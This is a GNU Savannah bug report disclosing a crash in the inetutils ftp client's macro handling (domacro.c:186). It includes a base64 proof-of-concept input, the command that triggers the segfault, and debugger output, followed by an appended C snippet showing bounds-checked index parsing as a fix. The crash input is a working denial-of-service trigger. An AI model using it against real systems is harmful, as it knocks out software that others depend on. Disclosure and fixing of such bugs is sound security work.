[bug #61722] Untrusted Pointer Dereference in domacro() at inetutils/ftp

From: AiDai
Subject: [bug #61722] Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186
Date: Thu, 23 Dec 2021 08:54:16 -0500 (EST)
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36

URL:
  <https://savannah.gnu.org/bugs/?61722>

                 Summary: Untrusted Pointer Dereference in domacro() at
inetutils/ftp/domacro.c:186
                 Project: GNU Networking Utilities
            Submitted by: aidai
            Submitted on: Thu 23 Dec 2021 01:54:14 PM UTC
                Category: None
                Severity: 3 - Normal
              Item Group: None
                  Status: None
                 Privacy: Public
             Assigned to: None
             Open/Closed: Open
         Discussion Lock: Any

    _______________________________________________________

Details:

# Untrusted Pointer Dereference in domacro() at inetutils/ftp/domacro.c:186

## Description

An Untrusted Pointer Dereference was discovered in domacro() at
inetutils/ftp/domacro.c:186. The vulnerability causes a segmentation fault and
application crash.

**version**

```
./ftp --version
ftp (GNU inetutils) 2.2.16-cf091
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later
<https://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

Written by many authors.
```

**System information**
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

**poc**

```
base64 poc
bWEgIAoCCiQkJCQkMiQkJDAkJCQkNTUxNTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1
NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1
NTU1NTU1NTU1NTU1NSQkCQICCgoCAAQJZAD/CgQX6ygKCgocCiQKCQIKCgoAAP////8K//8CCiQK
CP8g/3cCCgIACv8=
```

**command:**

```
./ftp < ./poc
```

**Result**

```
./ftp < ./poc
(macro name) Enter macro line by line, terminating it with a null line
?Invalid command
?Invalid command
?Invalid command
(macro name) [1]    2677333 segmentation fault  ./ftp < ./poc
```

**gdb**

```
domacro (argc=2, argv=0x55555557e680 <margv>) at domacro.c:186
186                                             strlen (argv[j + 1]) + 2))
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x555471c9ada0
 RBX  0x555555583646 ◂— 0x24242402
 RCX  0x21000
 RDX  0xffffffff1c71c720
 RDI  0x7ffff7f59b80 (main_arena) ◂— 0x0
 RSI  0x411
 R8   0x555555583640 ◂— 0x2402242424242424
 R9   0xd
 R10  0x55555557100d ◂— 0x504f4f4e002029 /* ') ' */
 R11  0x9
 R12  0x555555559f30 (_start) ◂— endbr64
 R13  0x7fffffffe220 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffe070 —▸ 0x7fffffffe0b0 —▸ 0x7fffffffe130 ◂— 0x0
 RSP  0x7fffffffe000 —▸ 0x55555557e680 (margv) —▸ 0x555555572c76 ◂— 0x6c75616665640024 /* '$' */
 RIP  0x55555556045a (domacro+815) ◂— mov    rax, qword ptr [rax]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x55555556045a <domacro+815>    mov    rax, qword ptr [rax]
   0x55555556045d <domacro+818>    mov    rdi, rax
   0x555555560460 <domacro+821>    call   strlen@plt                <strlen@plt>

   0x555555560465 <domacro+826>    lea    rdx, [rax + 2]
   0x555555560469 <domacro+830>    lea    rax, [rbp - 0x40]
   0x55555556046d <domacro+834>    mov    rcx, rdx
   0x555555560470 <domacro+837>    lea    rdx, [rip + 0x1e2c1]          <0x55555557e738>
   0x555555560477 <domacro+844>    mov    rsi, rax
   0x55555556047a <domacro+847>    lea    rdi, [rip + 0x1f6c7]          <0x55555557fb48>
   0x555555560481 <domacro+854>    call   lengthen                <lengthen>

   0x555555560486 <domacro+859>    test   eax, eax
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/inetutils/inetutils/ftp/domacro.c
   181                  j = 10 * j + *cp1 - '0';
   182                cp1--;
   183                if (argc - 2 >= j)
   184                  {
   185                    if (lengthen (&line, &cp2, &linelen,
 ► 186                                  strlen (argv[j + 1]) + 2))
   187                      {
   188                        allocflg = 1;
   189                        goto end_exec;
   190                      }
   191                    strcpy (cp2, argv[j + 1]);
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp 0x7fffffffe000 —▸ 0x55555557e680 (margv) —▸ 0x555555572c76 ◂— 0x6c75616665640024 /* '$' */
01:0008│     0x7fffffffe008 ◂— 0x25556a93e
02:0010│     0x7fffffffe010 —▸ 0x7ffff7d3b740 ◂— 0x7ffff7d3b740
03:0018│     0x7fffffffe018 ◂— 0x55583620 /* ' 6XU' */
04:0020│     0x7fffffffe020 ◂— 0x2e38e38e3
05:0028│     0x7fffffffe028 ◂— 0x0
06:0030│     0x7fffffffe030 —▸ 0x55555558364a ◂— 0x0
07:0038│     0x7fffffffe038 —▸ 0x55555557eb37 (macbuf+119) ◂— 0xa00020209242435
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x55555556045a domacro+815
   f 1   0x555555566a09 cmdscanner+633
   f 2   0x55555556665a main+929
   f 3   0x7ffff7d950b3 __libc_start_main+243
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  domacro (argc=2, argv=0x55555557e680 <margv>) at domacro.c:186
#1  0x0000555555566a09 in cmdscanner (top=1) at main.c:461
#2  0x000055555556665a in main (argc=0, argv=0x7fffffffe230) at main.c:310
#3  0x00007ffff7d950b3 in __libc_start_main (main=0x5555555662b9 <main>,
argc=1, argv=0x7fffffffe228, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe218) at
../csu/libc-start.c:308
#4  0x0000555555559f5e in _start ()
```

    _______________________________________________________

Reply to this item at:

  <https://savannah.gnu.org/bugs/?61722>

_______________________________________________
  Message sent via Savannah
  https://savannah.gnu.org/
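The source lines in the gdb output (domacro.c:181-186) accumulate the `$N` index with `j = 10 * j + *cp1 - '0'` and then guard the `argv[j + 1]` dereference only with `argc - 2 >= j`, a test that says nothing useful once the unchecked accumulation has wrapped. As an added example (not inetutils code and not the reporter's), this is one way to parse and validate that index before any pointer in the argument array is touched; it assumes the same layout as the snippet, where `$0` expands to `argv[1]`, and the helper names are mine.

```c
#include <limits.h>
#include <stdbool.h>
#include <string.h>

/* Overflow-checked replacement for the "$N" digit loop shown in the report
 * (added example, not inetutils code). The snippet accumulates j = 10*j + d
 * with no bound and then tests only argc - 2 >= j, which says nothing about
 * argv[j + 1] once j has wrapped. Returns the validated index or -1. */
static int parse_macro_arg_index(const char *digits, size_t ndigits, int argc)
{
    int j = 0;
    for (size_t i = 0; i < ndigits; i++) {
        int d = digits[i] - '0';
        if (d < 0 || d > 9)
            return -1;                 /* reject the first non-digit */
        if (j > (INT_MAX - d) / 10)
            return -1;                 /* 10 * j + d would overflow int */
        j = 10 * j + d;
    }
    /* "$j" expands to argv[j + 1], so j must satisfy 0 <= j <= argc - 2. */
    if (j > argc - 2)
        return -1;
    return j;
}

/* Copy argv[j + 1] into out only after both the index and the destination
 * size are validated; this is the strlen/strcpy step from the snippet. */
static bool substitute_macro_arg(const char *digits, size_t ndigits, int argc,
                                 char **argv, char *out, size_t outlen)
{
    int j = parse_macro_arg_index(digits, ndigits, argc);
    if (j < 0) return false;
    size_t need = strlen(argv[j + 1]) + 1;   /* include the terminator */
    if (need > outlen) return false;
    memcpy(out, argv[j + 1], need);
    return true;
}

/* Constructed macro argv: "$0" -> "hello", "$1" -> "world". "$2" has no
 * argument and an 11-digit index overflows; both must be refused. */
static bool demo_substitution(void)
{
    char *argv[] = { "macro", "hello", "world" };
    char out[16];
    return substitute_macro_arg("1", 1, 3, argv, out, sizeof out)
        && strcmp(out, "world") == 0
        && !substitute_macro_arg("2", 1, 3, argv, out, sizeof out)
        && !substitute_macro_arg("99999999999", 11, 3, argv, out, sizeof out);
}
```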
